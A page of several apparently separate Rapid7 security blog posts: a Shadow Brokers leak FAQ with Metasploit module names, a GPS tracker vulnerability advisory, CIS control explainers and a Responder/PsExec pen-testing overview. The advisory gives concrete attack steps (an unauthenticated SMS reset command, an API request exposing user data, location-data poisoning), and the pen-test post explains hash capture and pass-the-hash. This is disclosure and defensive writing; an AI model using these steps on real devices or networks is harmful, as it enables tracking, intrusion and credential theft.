Rapid7 is dedicated to strengthening cybersecurity for organizations, protecting consumers, and empowering the independent security research community to safely disclose vulnerabilities they've discovered. All these goals come together on the issue of coordinated vulnerability disclosure processes. As we increasingly depend on complex and flawed software and systems, we must pave the way for greater community participation in security. Facilitating communication between technology providers and operators and independent researchers is an important step toward greater collaboration aimed at keeping users safe.

 

Rapid7 is thrilled to be working with so many companies, groups, and individuals to advance vulnerability disclosure and handling processes. As government agencies consider how cybersecurity fits into their missions, and how to advise the public and private sectors on what to do to best protect themselves, we expect more opportunities to come.

 

You can learn more about our policy engagement efforts on Rapid7's public policy page.

The Rapid7 team has been busy evaluating the threats posed by last Friday’s Shadow Broker exploit and tool release and answering questions from colleagues, customers, and family members about the release. We know that many people have questions about exactly what was released, the threat it poses, and how to respond, so we have decided to compile a list of frequently asked questions.


What’s the story?

On Friday, April 15, a hacking group known as the “Shadow Brokers” released a trove of alleged NSA data, detailing exploits and vulnerabilities in a range of technologies. The data includes information on multiple Windows exploits, a framework called Fuzzbunch for loading the exploit binaries onto systems, and a variety of post-exploitation tools.


This was understandably a cause for concern, but fortunately, none of the exploits were zero days. Many targeted older systems and the vulnerabilities they exploited were well-known, and four of the exploits targeted vulnerabilities that were patched last month.

 

Who are these shady characters?

The Shadow Brokers are a group that emerged in August of 2016, claiming to have information on tools used by a threat group known as Equation Group. The initial information that was leaked by the Shadow Brokers involved firewall implants and exploitation scripts targeting vendors such as Cisco, Juniper, and Topsec, which were confirmed to be real and subsequently patched by the various vendors. Shadow Brokers also claimed to have access to a larger trove of information that they would sell for 1 million bitcoins, and later lowered the amount to 10,000 bitcoins, which could be crowdfunded so that the tools would be released to the public, rather than just to the highest bidder. The Shadow Brokers have popped up from time to time over the past 9 months leaking additional information, including IP addresses used by the Equation Group and additional tools. Last week, having failed to make their price, they released the password for the encrypted archive, and the security community went into a frenzy of salivation and speculation as it raced to unpack the secrets held in the vault.

 

The April 15th release seems to be the culmination of the Shadow Brokers’ activity; however, it is possible that there is still additional information about the Equation Group that they have not yet released to the public.

 

Should you be worried?

A trove of nation state-level exploits being released for anyone to use is certainly not a good thing, particularly when they relate to the most widely-used software in the world, but the situation is not as dire as it originally seemed. There are patches available for all of the vulnerabilities, so a very good starting point is to verify that your systems are up to date on patches. Home users and small network operators likely had the patches installed automatically in the last update, but it is always good to double-check. 


If you are unsure if you are up to date on these patches, we have checks for them all in Rapid7 Nexpose and Rapid7 InsightVM. These checks are all included in the Microsoft hotfix scan template.

 

EternalBlue

EternalSynergy

EternalRomance

EternalChampion

MS17-010

msft-cve-2017-0143

msft-cve-2017-0144

msft-cve-2017-0145

msft-cve-2017-0146

msft-cve-2017-0147

msft-cve-2017-0148

EmeraldThread

MS10-061

WINDOWS-HOTFIX-MS10-061

EskimoRoll

MS14-068

WINDOWS-HOTFIX-MS14-068

EducatedScholar

MS09-050

WINDOWS-HOTFIX-MS09-050

EclipsedWing

MS08-067

WINDOWS-HOTFIX-MS08-067

 

If you want to ensure your patching efforts have been truly effective, or understand the impact of exploitation, you can test your exposure with several modules in Rapid7 Metasploit:

 

EternalBlue

MS17-010

auxiliary/scanner/smb/smb_ms17_010

EmeraldThread

MS10-061

exploit/windows/smb/psexec

EternalChampion

MS17-010

auxiliary/scanner/smb/smb_ms17_010

EskimoRoll

MS14-068 / CVE-2014-6324

auxiliary/admin/kerberos/ms14_068_kerberos_checksum

EternalRomance

MS17-010

auxiliary/scanner/smb/smb_ms17_010

EducatedScholar

MS09-050

auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh, auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff, exploits/windows/smb/ms09_050_smb2_negotiate_func_index

EternalSynergy

MS17-010

auxiliary/scanner/smb/smb_ms17_010

EclipsedWing

MS08-067

auxiliary/scanner/smb/ms08_067_check

exploits/windows/smb/ms08_067_netapi

 

In addition, all of the above exploits can also be pivoted to a Meterpreter session via the DoublePulsar implant.

 

What else can you do to protect yourselves?

If patching is still in progress or will take a little bit longer to fully implement (we get it) then there are detections for the exploits that you can implement while patching in underway. For examples of ways to implement detections, check out this blog post from Mike Scutt.

 

Rapid7 InsightIDR, our solution for incident detection and response, has an active Threat Community with intelligence to help detect the use of these exploits and any resulting attacker behavior. You can subscribe to this threat in the community portal. For more on how threat intel works in InsightIDR, check out this 4-min Solution Short.

 

It is also important to stay aware of other activity on your network during the patching and hardening processes. It is easy to get distracted by the latest threats, and attackers often take advantage of defender preoccupation to achieve their own goals, which may or may not have anything to do with this latest tool leak.

 

What about that IIS 6 box we have on the public internet?

It is very easy for commentators to point fingers and say that anyone who has legacy or unsupported systems should just get rid of them, but we know that the reality is much more complicated. There will be legacy systems (IIS 6 and otherwise) in organizations that for whatever reason cannot just be replaced or updated. That being said, there are some serious issues with leaving systems that are vulnerable to these exploits publicly accessible. Three of the exploits (“EnglishmanDentist”, “EsteemAudit”, and “ExplodingCan”) will remain effective on EOL systems and the impacts are concerning enough that it is really not a good idea to have internet-facing vulnerable systems. If you are in this position we recommend coming up with a plan to update the system and to keep a very close eye on the development of this threat. Due to the sophistication of this tool set, if widespread exploitation starts then it will likely only be a matter of time before the system is compromised.

 

Should you be worried about the Equation Group?

The threat from Equation Group itself to most organizations is minimal, unless your organization has a very specific threat profile. Kaspersky’s initial analysis of the group lists the countries and sectors that they have seen targeted in the past. This information can help you determine if your organization may have been targeted.

 

While that is good news for most organizations, that doesn’t mean that there is no cause for concern. These tools appear to be very sophisticated, focusing on evading security tools such as antivirus and generating little to no logging on the systems that they target. For most organizations the larger threat is that of attackers co-opting these very sophisticated and now public exploits and other post-exploitation tools and using them to achieve their own goals. This increases the threat and makes defending against, and detecting, these tools more critical. We have seen a sharp decrease in the amount of time it take criminals to incorporate exploits into their existing operations. It will not be long before we will start to see more widespread attacks using these tools.


Where should I build my underground bunker?

While this particular threat is by no means a reason to go underground, there are plenty of other reasons that you may need to hide from the world and we believe in being prepared. That being said, building your own underground bunker is a difficult and time consuming task, so we recommend that you find an existing bunker, pitch in some money with some friends, and wait for the next inevitable bunker-level catastrophe to hit, because this isn’t it.

 

Build a bunker.jpg

It’s the $64,000 question in security – both figuratively and literally: where do you spend your money? Some people vote, at least initially, for risk assessment. Some for technology acquisition. Others for ongoing operations. Smart security leaders will cover all the above and more. It’s interesting though – according to a recent study titled the 2017 Thales Data Threat Report, security spending is still a bit skewed. For instance, security compliance is the top driver of security spending. One would think that business risk and common sense would be core drivers but we all know how the world works.

 

The Thales study also found that network and endpoint security were their top spending priorities yet 30 percent of respondents say their organizations are 'very vulnerable' or 'extremely vulnerable' to security attacks. So, people are spending money on security solutions that may not be addressing their true challenges. Perhaps more email phishing testing needs to be performed. I’m finding that to be one of the most fruitful exercises anyone can do to improve their security program – as long as it’s being done the right way. Maybe more or better security assessments are required. Only you – and the team of people in charge of security – will know what’s best. 

 

The mismatch of security priorities and spending is something I see all the time in my work. Security policies are documented, advanced technologies are implemented, and executives are assuming that all is well with security given all the effort and money being spent. Yet, ironically, in so many cases not a single vulnerability scan has been run, much less a formal information risk assessment has been performed. Perhaps testing has been done but maybe it wasn’t the right type of testing. Or, the right technologies have been installed but their implementation is sloppy or under-managed.

 

This mismatch is an issue that’s especially evident in healthcare (i.e. HIPAA compliance checkbox) but affects businesses large and small across all industries. It’s the classic case of putting the cart before the horse. I strongly believe in the concept of “you cannot secure what you don’t acknowledge”. But you first have to properly acknowledge the issues – not just buy into them because they’re “best practice”. Simply going through the motions and spending money on security will make you look busy and perhaps demonstrate to those outside of IT and security that something is being done to address your information risks. But that’s not necessarily the right thing to do.

 

The bottom line, don’t spend that hard-fought $64,000 on security just for the sake of security. Step back. Know what you’ve got, understand how it’s truly at risk, and then, and only then, should you do something about it. Look at the bigger picture of security – what it means for your organization and how it can best be addressed based on your specific needs rather than what someone else is eager to sell you.

Seven issues were identified with the Eview EV-07S GPS tracker, which can allow an unauthenticated attacker to identify deployed devices, remotely reset devices, learn GPS location data, and modify GPS data. Those issues are briefly summarized on the table below.

 

These issues were discovered by Deral Heiland of Rapid7, Inc., and this advisory was prepared in accordance with Rapid7's disclosure policy.

 

Vulnerability DescriptionR7 IDCVEExploit Vector
Unauthenticated remote factory resetR7-2016-28.1CVE-2017-5237Phone number
Remote device identificationR7-2016-28.2

None

(identification)

Phone number range
Lack of configuration bounds checksR7-2016-28.3CVE-2017-5238Phone number
Unauthenticated access to user dataR7-2016-28.4

None

(server-side issue)

Web application
Authenticated user access to other users' dataR7-2016-28.5

None

(server-side issue)

Web application user account
Sensitive information transmitted in cleartextR7-2016-28.6CVE-2017-5239Man-in-the-Middle (MitM) Network
Web application data poisoningR7-2016-28.7

None

(server-side issue)

Web application

 

Product Description

The EV-07S is a personal GPS tracker device used for personal safety and security, described at the vendor's website as being primarily intended for tracking elderly family members; disabled and patient care; child protection; employee management; and pet and animal tracking. Test devices were acquired from Eview directly, and an example is shown below in Figure 1.

f1.png

Figure 1: The EV-07S personal GPS tracker device

 

R7-2016-28.1: Unauthenticated remote factory reset

Given knowledge of the EV-07S's registered phone number, the EV-07S device can be reset to factory level setting by sending "RESET!" as a command in an SMS message to the device. Only the phone number is required; no password or physical access is required to accomplish this task. After a factory reset, the device can then be reconfigured remotely via SMS messages without need of password. The product manual states this functionality, so it appears to be a fundamental design flaw with regard to secure configuration.

 

Mitigation for R7-2016-28.1

A vendor-supplied patch should prevent the device from allowing unauthenticated factory reset without having physical access to the device.

 

Absent a patch, users should regularly check their device to ensure the configuration has not be deleted or altered.

 

R7-2016-28.2: Remote device identification

The EV-07S device, once set up with a password, should not respond to any SMS queries sent to the device's phone number. According to the user manual, no password is needed to send "reboot" and "RESET!" commands to the device. Testing showed, in spite of user manual statement, that the "reboot" command required a password if device is set up for authentication. Further manual fuzzing test via SMS reveled that the command "REBOOT!" will cause the device to respond with the message "Format error!".

 

Due to providing this negative response, a malicious actor could use this command to enumerate all devices by trying all likely phone numbers, commonly known as a war dialing operation, using SMS messages containing the "REBOOT!" command.

 

f2.png

Figure 2: SMS command response on password protected device

 

Mitigation for R7-2016-28.2

A vendor-supplied patch should disable the response from the "REBOOT!" command when password protection is enabled.

 

R7-2016-28.3: Lack of configuration bounds checks

Several input configuration fields were discovered to not be performing proper bounds checks on incoming SMS messages. If a device's phone number is known to an attacker, this lack of bounds checking allows the overly long input of one configuration setting to overwrite data of another setting. An example of this is shown in Figure 3, where the "Authorized Number" setting A1 is used to overwrite setting B1:

 

f3.png

Figure 3: Configuration Setting Overflow Via SMS Message

 

Mitigation for R7-2016-28.3

A vendor-supplied patch should implement bounds checks and input sanitization on all entered configuration data.

 

Absent a vendor-supplied patch, users should be mindful of entering any values of excessive length. In the case with Authorized Number setting anything over 20 characters will overwrite the next setting in line.

 

R7-2016-28.4: Unauthenticated access to user data

A malicious actor can gain access to user data including account name, TrackerID and device IMEI id. This is done by posting userId=5XXXX&trackerName=&type=allTrackers with a the target's userID number to the API  at http://www.smart-tracking.com/web/searchTrackerList.do .  An example of this shown below in Figure 4:

 

f4.png

Figure 4: HTTP post to gain access to user data

 

Given the small keyspace involved with guessing valid user IDs of 5 digits, it appears trivial to determine all valid user IDs.

 

Mitigation for R7-2016-28.4

A vendor-supplied patch on the vendor web application should prevent unauthenticated access to individual user data.

 

Absent a vendor-supplied patch, users should be careful when trusting the realtime tracking services with their device.

 

R7-2016-28.5: Authenticated access to other users' data

An authenticated user can gain access to others users configuration and device GPS data if they know or guess a valid userId, device IMEI or TrackerID. The following three examples (Figures 5 through 7) show this level of access from one authenticated account being able to access another account's data.

 

f5.png

Figure 5: Access to another user's configuration data

 

f6.png

Figure 6: Access to Another users Device GPS Data

 

f7.png

Figure 7: Access to Another Users GPS Tracker Configuration

 

Mitigation for R7-2016-28.5

A vendor-supplied patch should prevent access to other users data.

 

Absent a vendor-supplied patch, users should be careful when trusting the realtime tracking services with their device.

 

R7-2016-28.6:  Sensitive information transmitted in cleartext

The web application used for realtime tracking web application, hosted at http://www.smart-tracking.com , does not utilize SSL/TLS encryption for HTTP services. Also the EV-07S device passes IMEI and GPS data to this website over the Internet on TCP port 5050 without any encryption. An example of this captured unencrypted data is show below in Figure 8:

 

f8.png

Figure 8: Unencrypted Transfer of Information From Device Over Port 5050

 

Mitigation for R7-2016-28.6

A vendor-supplied patch on both the server and the client should enable encrypted transfer of data to website, as well as an update of the website to enable HTTPS service and serve these pages only over HTTPS.

 

Absent a vendor-supplied patch, users should be careful when trusting the realtime tracking services with their device.

 

R7-2016-28.7:  Data poisoning

An unauthenticated attacker can poison the realtime tracking data by injecting device data similar to the data structure shown above in Figure 8 to the server at www.smart-tracking.com over TCP port 5050. The attacker can do this only if they know a device's IMEI number, but that data is learnable through mechanisms described above.

 

An example of this is shown in Figure 9, where the device's realtime tracking data was poisoned to make the device appear to be Moscow, Russia (it was not).

 

f9.png

Figure 9: Real time tracking data poisoned

 

Mitigation for R7-2016-28.7

A vendor-supplied patch should enable authentication before allowing device data to be posted to the site on TCP port 5050.

 

Absent a vendor-supplied patch, users should be careful when trusting the realtime tracking services with their device.

 

Disclosure Timeline

  • Mon, Dec 12, 2016: Initial contact made to the vendor.
  • Tue, Dec 20, 2016: Vendor responded and details provided to info@eviewltd.com.
  • Tue, Dec 27, 2016: Disclosure to CERT/CC, VU#375851 assigned.
  • Wed, Mar 08, 2017: CVEs assigned in conjunction with CERT/CC.
  • Mon, Mar 27, 2017: Vulnerability disclosure published.

The ultimate goal of an information security program is to reduce risk. Often, hidden risks run amok in organizations that just aren’t thinking about risk in the right way. Control 5 of the CIS Critical Security Controls can be contentious, can cause bad feelings, and is sometimes hated by system administrators and users alike. It is, however, one of the controls that can have the largest impact on risk. Therefore it is an important control, and the conversation around why it is important is also important. We’ll talk about both.

 

remote-control-149842_960_720.pngMisuse of privilege is a primary method for attackers to land and expand inside networks. Two very common attacks rely on privilege to execute. The first is when a user running with privilege is tricked into opening a malicious attachment, or gets malware from a drive-by website, such as malware which loads silently in the background. Privileged accounts just make these attacks succeed quickly, and user machines can be controlled, or keylogging can be installed, or running malicious processes can be hidden from view.

 

The second common technique is the elevation of privilege when guessing or cracking a password for an administrative user and gaining access on a target machine. Especially if the password policy is weak (8 characters is not sufficient!) or not enforced, the risk increases.

 

What it is

Reducing administrative privilege specifically means running services or accounts without admin level access all the time. This does not mean that no one should have admin, it means admin privilege should be heavily restricted to only those users whose jobs, and more specifically tasks, require admin privilege.

 

Regular, normal users of a system should never require admin privilege to do daily tasks. Superusers of a system might require admin access for certain tasks, but don’t necessarily need it all the time. Even system administrators do not require admin level access 100% of the time to do their jobs. Do you need admin access to read & send emails? Or search the web?

 

 

How to implement it

There’s a lot of different ways to implement restrictions on admin privilege. You are first going to have to deal with the political issues of why to do this. Trust me, addressing this up front saves you a lot of heartache later on.

 

The political stuff

Case #1: All users have admin, either local admin and/or admin account privileges

 

My first question, when I see this happening in any organization, is “why do they need this?”

 

Typical answers are:

  • They need to install software [HINT: no they don’t.]
  • Applications might fail to work [Possible but unlikely, the app just might be installed improperly.]
  • They need it to print !!! [No.]
  • My executives demand it [They demand a lot in IT without understanding. Help them understand. See below.]
  • Why not? [Seriously?]

 

All of these Some of these are valid responses. The problem is we don’t understand the root issue that’s driving the reason that everyone needs admin level access to do their daily duties. And this is probably true of many organizations. It’s simpler just to give admin access because things will then work, but you create loads of risk when you do this. You have to take the time to determine what functions actually need the access, and remove this access from those functions that don’t require it, to lower the risk and the attack surface.

 

All of these responses speak to worries about not being able to do a business function when they need to. They also imply that the people in charge of approving these permissions really don’t understand the risks associated with imparting them. We need to get them to understand the lowered risks of possibly needing admin once or twice, and much higher risks of having it when attackers strike.

 

Case #2: Your admins say they have to have it “to do their jobs”

 

I don’t disagree with this statement. Admins do need admin rights to do some tasks. But not every task calls for it. Do this exercise: list all the daily tasks an admin does on an average day. Then, mark each task which does not require admin privilege to accomplish. Show that list to the person responsible for managing risk in your organization. Then simply create a separate, normal user account for your admins, and require them to use it for all those tasks that are marked. For all other tasks, they escalate into their admin account and then de-escalate when done. It's an extra step, and it is a secure one.

 

The conversation

cranium-2028558__480.png

Now have the conversation. It may be painful. I have actually been in meetings where people got so mad they threw things, and would be in tears when we told them we were “taking away” their privilege. This is why we say “reducing” or "controlling.” These are important words. The phrase is “we’re reducing/controlling risk by allowing you to use your privilege only for tasks that require it.” For executives that demand it, point out they are the highest risk to the organization due to their status and are frequently a high value target sought by attackers.

 

Then you support your conversation with information from around the web, whitepapers, studies, anything that helps drive your point.

 

For example this article from Avecto illustrates 97% of critical Windows vulnerabilities are mitigated when reducing admin privilege. Allowing you to focus on the remaining 3%, and be more effective. Search around, there’s lots more good supporting material.

 

This does not need to be an expensive exercise. Using techniques like Windows delegation of authority, you can give administrative privilege to users for specific tasks, like delegating to your help desk the ability to disable accounts or move them to different OUs. They don’t need full admin to do this. On linux systems, using sudo instead of root interactively is much less risky.

 

If you are a compliance-driven organization, most compliance requirements state reduction of admin is required as part of access controls. Here’s a brief glimpse of some compliance requirements that are addressed by Control 5:

 

  • PCI Compliance Objective “Implement strong access control measures”
    • Sections 7.1, 7.2, 7.3, 8.1, 8.2, 8.3, 8.7

 

  • HIPAA Compliance 164.308(a)(4)(ii)(B)
    • Rights and/or privileges should be granted to authorized users based on a set of access rules that the covered entity is required to implement as part of § 164.308(a)(4), the Information Access Management standard under the Administrative Safeguards section of the Rule.

 

  • FFIEC (Federal Financial Institutions Examination Council)
    • Authentication and Access Controls

 

The technical stuff

Reducing admin privilege supports the Pareto principle, or the 80/20 rule. Effectively, reducing admin privilege, combined with the first four CIS critical security controls, can reduce the risks in your organization by 80% or more. This allows you to focus on the remaining 20%. It’s very likely the risk factor reduction is even higher! The Australian Signals Defence Directorate lists reducing admin in its Top 4 Mitigation Strategies, along with elements from Control 2 by using application whitelisting, and Control 4 by having an ongoing patching program.

 

Here is Microsoft’s guidance on implementing Least-Privilege Administrative Models. If you use Active Directory and are on a Windows domain this is very helpful in making meaningful changes to your admin models.

 

For Linux environments, each sysadmin should have a separate account. Enforce them using the ‘su’ command to gain root. Better yet is disabling su and enforcing the use of the ‘sudo’ command.

 

There are also 3rd parties who sell software which can help with this, such as CyberArk Viewfinity, Avecto PrivilegeGuard, BeyondTrust Powerbroker or Thycotic Privilege Manager. Note Rapid7 does not partner with these companies, but we recommend them based on what we see other organizations deploying.

 

All the other things

As with most of the controls, the sub-controls also list other precautions.

 

  • Change all default passwords on all deployed devices
  • Use multi-factor authentication for all administrative access
  • Use long passwords (14 characters or more)
  • Require system admins to have a normal account and a privileged account, and access the privileged account through an escalation mechanism, such as sudo for Linux or RunAs for Windows.
  • Configure systems to issue alerts on unsuccessful logins to admin accounts. Rapid7 offers products such as InsightIDR which can detect and alert on these events. A use case might be if an admin leaves for vacation, you monitor their account and if you see any login attempts, it triggers an investigation.
  • As an advanced control, admin tasks can only be performed on machines which are air-gapped from the rest of the network, and only connect to systems they need to administer.

 

Reducing or controlling admin is not hard to implement. However, it is a change to the way things are being done, and fear of change is very powerful. Do your best to have conversations to ease the fear. You are not taking anything away. You are simply making it harder for errors to occur which have large impact, and you are reducing the risk that an attacker can easily comprise an account, a system, fileshares, sensitive data, and more.

 

Related Resources

 

CIS Critical Control 1: Inventory of Authorized and Unauthorized Devices Explained

CIS Critical Control 2: Inventory of Authorized and Unauthorized Software Explained

CIS Critical Control 3: Secure Configurations for Hardware & Software Explained

CIS Critical Control 4: Continuous Vulnerability Assessment & Remediation

By Emilie St-Pierre, TJ Byrom, and Eric Sun

 

Ask any pen tester what their top five penetration testing tools are for internal engagements, and you will likely get a reply containing nmap, Metasploit, CrackMapExec, SMBRelay and Responder.

 

 

An essential tool for any whitehat, Responder is a Python script that listens for Link-Local Multicast Name Resolution (LLMNR), Netbios Name Service (NBT-NS) and Multicast Domain Name System (mDNS) broadcast messages (Try saying that out loud 5 times in a row!). It is authored and maintained by Laurent Gaffie and is available via its GitHub repository, located at https://github.com/lgandx/Responder.

 

Once you find yourself on an internal network, Responder will quickly and stealthily get user hashes when systems respond to the broadcast services mentioned above. Those hashes can then be cracked with your tool of choice. As Responder’s name implies, the script responds to the broadcast messages sent when a Windows client queries a hostname that isn’t located within the local network’s DNS tables. This is a common occurrence within Windows networks, and a penetration tester doesn’t need to wait too long before capturing such broadcast traffic. Behold our beautiful diagram to help visualize this concept:

 

Due to the client viewing any reply as legitimate, Responder is able to send its own IP as the query answer, no questions asked. Once received, the client then sends its authentication details to the malicious IP, resulting in captured hashes. And believe us, it works - we’ve seen penetration testers get hashes in a matter of seconds using this tool, which is why it is used early within an internal engagement’s timeline.

 

If no hashes are captured via the first method, Responder can be also be used to man-in-the-middle Internet Explorer Web-Proxy Autodiscovery Protocol (WPAD) traffic. In a similar manner to the previous attack, Responder replies with its own IP address for clients querying the network for the “wpad.dat” Proxy Auto-Config (PAC) file. If successful, Responder once again grabs the hashes which can then be cracked, or if time is of the essence, used to pass-the-hash with PsExec (PsExec examples) as we will demonstrate below.

Once hashes have been captured, it’s time to get cracking! Responder saves all hashes as John Jumbo compliant outputs and a SQLite database. A reliable cracking tool such as John the Ripper can be used to complete this step. Even if cracking is unsuccessful, hashes can be used to validate access to other areas of the target network. This is the beauty of using Responder in conjunction with PsExec.

 

PsExec is a Windows-based administrative tool which can be leveraged to move laterally around the target network. It is useful to launch executables, command prompts and processes on systems. There are numerous tools available for penetration testers who wish to take advantage of PsExec’s availability within a network. For example, Metasploit has over 7 PsExec-related modules, its most popular ones being psexec and psexec_psh. There’s also the previously-mentioned Windows executable and Core Security’s impacket psexec python script. All are potential options depending on the penetration tester’s preferences and tool availability.

 

 

 

Many networks today struggle to reliably detect remote code execution, which is why it’s very common for penetration testers to use Responder and PsExec in the early stages of an engagement. This is due to default Windows environment configurations, as well as protocol-specific behavior which by default trusts all responses. 

 

Fortunately, such attacks can be prevented and detected. To mitigate the first attack we mentioned using Responder’s broadcast attacks, these can be prevented by disabling LLMNR and NBT-NS. Since networks already use DNS, these protocols aren’t required unless you’re running certain instances of Windows 2000 or earlier (in which case, we recommend a New Year’s resolution of upgrading your systems!).

 

To prevent the second showcased Responder attack caused by WPAD traffic, it is simply a matter of adding a DNS entry for ‘WPAD’ pointing to the corporate proxy server. You can also disable the Autodetect Proxy Settings on your IE clients to prevent this attack from happening.

 
If your company uses Rapid7’s InsightIDR, you can detect use of either Responder or PSExec. Our development team works closely with our pen-test and incident response teams to continuously add detections across the Attack Chain. For that reason, the Insight Endpoint Agent in real-time collects the data required to detect remote code execution and other stealthy attack vectors. For a 3-minute overview on InsightIDR, our incident detection and response solution that combines User Behavior Analytics, SIEM, and EDR, check out the below video.

 

Rapid7 InsightIDR 3-Min Overview - YouTube

 

References:

https://github.com/lgandx/Responder

https://technet.microsoft.com/en-us/sysinternals/pxexec.aspx

https://community.rapid7.com/community/metasploit/blog/2013/03/09/psexec-demysti fied

https://github.com/CoreSecurity/impacket/blob/master/examples/psexec.py

http://www.openwall.com/john/

https://www.microsoft.com/en-us/download/details.aspx?id=36036

https://www.sans.org/reading-room/whitepapers/testing/pass-the-hash-attacks-tool s-mitigation-33283

Welcome to the fourth blog post on the CIS Critical Security Controls! This week, I will be walking you through the fourth Critical Control: Continuous Vulnerability Assessment & Remediation. Specifically, we will be looking at why vulnerability management and remediation is important for your overall security maturity, what the control consists of, and how to implement it.

 

Organizations operate in a constant stream of new security information: software updates, patches, security advisories, threat bulletins, etc. Understanding and managing vulnerabilities has become a continuous activity and requires a significant amount of time, attention and resources. Attackers have access to the same information, but have significantly more time on their hands. This can lead to them taking advantage of gaps between the appearance of new knowledge and remediation activities.

 

By not proactively scanning for vulnerabilities and addressing discovered flaws, the likelihood of an organization's computer systems becoming compromised is high. Kind of like building and implementing an ornate gate with no fence. Identifying and remediating vulnerabilities on a regular basis is also essential to a strong overall information security program.

 

What it is:

The Continuous Vulnerability Assessment and Remediation control is part of the “systems” group of the 20 critical controls. This control consists of eight (8) difference sections with 4.1 and 4.3 giving guidelines around performing vulnerability scans, 4.2 and 4.6 talk about the importance of monitoring and correlating logs, 4.4 addresses staying on top of new and emerging vulnerabilities and exposures, 4.5 and 4.7 pertains to remediation, and 4.8 talks about establishing a process to assign risk ratings to vulnerabilities.

 

How to implement it

To best understand how to integrate each section of this control into your security program, we’re going to break them up into the logical groupings I described in the previous section (scanning, logs, new threats and exposures, risk rating, and remediation).

 

A large part of vulnerability assessment and remediation has to do with scanning, as proven by the fact that two sections directly pertain to scanning and two others indirectly reference it by discussing monitoring scanning logs and correlating logs to ongoing scans. The frequency of scanning will largely depend on how mature your organization is from a security standpoint and how easily it can adopt a comprehensive vulnerability management program. Section 4.1 specifically states that vulnerability scanning should occur weekly, but we know that that is not always possible due to various circumstances. This may mean monthly for organizations without a well-defined vulnerability management process or weekly for those that are better established. Either way, when performing these scans it is important to have both an internal and external scan perspective. This means that scans on machines that are internally-facing only should have authenticated scans performed on them and outward-facing devices should have both authenticated and unauthenticated scans performed.

 

Another point to remember about performing authenticated scans is that the administrative account being used for scans should not be tied to any particular user. Since these credentials will have administrative access to all devices being scanned, we want to decrease the risk of them getting compromised. This is also why it is important to ensure all of your scanning activities are being logged, monitored, and stored.

 

Depending on the type of scan you are running, your vulnerability scanner should be generating at least some attack detection events. It is important that your security team is able to (1) see that these events are being generated and (2) can match them to scan logs in order to determine whether the exploit was used against a target known to be vulnerable instead of being part of an actual attack. Additionally, scan logs and alerts should be generated and stored to track when and where the administrative credentials were being used. This way, we can determine that the credentials are only being used during scans on devices for which the use of those credentials has been approved.

 

So now that we have discussed scanning and logs, we are going to address how you can keep up with all of the vulnerabilities being released. There are several sites and feeds that you can subscribe to in order to stay on top of new and emerging vulnerabilities and exposures. Some of our favorite places are:

 

It isn’t enough to just be alerted to new vulnerabilities, however, we need to take the knowledge we have about our environment into consideration and then determine how these vulnerabilities will impact it. This is where risk rating comes into play. Section 4.8 states that we must have a process to risk-rate a vulnerability based on exploitability and potential impact and then use that as guidance for prioritization of remediation. What it doesn’t spell out for us is what this process looks like. Typically, when we work with an organization, we recommend that for each asset they take three factors into consideration:

  1. Threat Level – How would you classify the importance of the asset in terms of the data it hosts as well as its exposure level? For example, a web server may pose a higher level of threat than a device that isn’t accessible via the Internet.
  2. Risk of Compromise – What is the likelihood that the vulnerability will compromise this system? Something to keep in mind is how easy is it to exploit this vulnerability, does it require user interaction, etc.
  3. Impact of Compromise –What is the impact to the confidentiality, integrity, and availability of the system and data it hosts should a particular vulnerability gets exploited?

 

After our scans are complete and we are staring at the long list of vulnerabilities found on our systems, we need to determine the order in which we will do remediation.

 

In order to ensure patches are being applied across all systems within the organization, it is recommended to deploy and use an automated patch management tool as well as a software update tool. As you look to increase the overall security maturity of your organization, you will see that these tools are necessary if you want to have a standardized and centrally managed patching process. In more mature organizations, part of the remediation process will include pushing patches, updates, and other fixes to a single host initially. When the patching efforts are complete on this one device, the security team then performs a scan of that device in order to ensure the vulnerability was remediated prior to pushing the fix across the entire organization via the aforementioned tools. Tools are not enough to ensure that patches were fully and correctly applied, however. Vulnerability management is an iterative process, which means that vulnerability scans that occurs after remediation should be analyzed to ensure that vulnerabilities that were supposed to be remediated are no longer showing upon the report.

 

Vulnerability management software helps you identify the holes that can be used during an attack and how to seal them before a breach happens. But it’s more than launching scans and finding vulnerabilities; it requires you to create processes around efficient remediation and to ensure that the most critical items are being fixed first. What you do with the data you uncover is more important than simply finding vulnerabilities, which is why we recommend integrating the processes around each section of Critical Control 4.

 

Related Resources

 

Filter Blog

By date: By tag: